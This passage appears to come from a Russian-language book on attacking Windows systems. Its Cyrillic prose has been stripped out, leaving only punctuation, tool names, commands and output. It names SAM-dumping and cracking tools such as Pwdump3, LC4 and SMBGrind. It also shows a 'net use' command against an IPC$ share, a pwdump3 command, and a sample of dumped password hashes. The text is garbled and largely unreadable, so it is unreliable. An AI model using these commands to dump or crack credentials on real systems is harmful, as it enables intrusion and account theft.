, . nbtstat MIB, - , (. [3] [4]). , , . , . D:\>net use \\1.0.0.1\1$ * /u:Administrator * , IPC$ Administrator. : Type password for \\1.0.0.1\IPC$: . , - 165

, , , . , , , SMBGrind, CyberCop Scanner Network Associates. ( [3]). - . , , , . Windows NT/2000/XP , SAM (Security Account Manager - ). SAM (, , ) , , , . , - , , , , . , SAM, LC4 ( LOphtcrack, - LC4) (http://www.atstake.com/research/redirect.html), . Samdump - SAM. Pwdump - , . Syskey SAM ( Syskey . 2). Pwdump2 - , Syskey. . Pwdump3 - , Pwdump2, . Syskey, 2; , SAM, Windows 2000/XP , Windows NT . 2 , , , . Sword-2000 PwdimpS, : C:\>pwdump3 sword-2000 > password.psw

166

Windows 2000/XP Sword-2000, password.psw. (Notepad) (. 10.5).sword.psw - Notepad File Edit Format Help \dministator: SOO:7A01665EB2B6C14AAD3B435B51404EE:OB0412D8761239A73143EFAE928E9FO A::: Guest:501 :NO PASSWORD*"' :NO PASSWORD * ::: krbtgt:S02:NO PASSWORD ' :7BD70B6AF1C3909E006426SFE207B256::: Alex:1110:7A01665EB2EB6C14MD3B43SB51404EE:OB0412D8761239A73143EFAE92eE9FOA;:: Alex-1:1113:7A01665EB2EB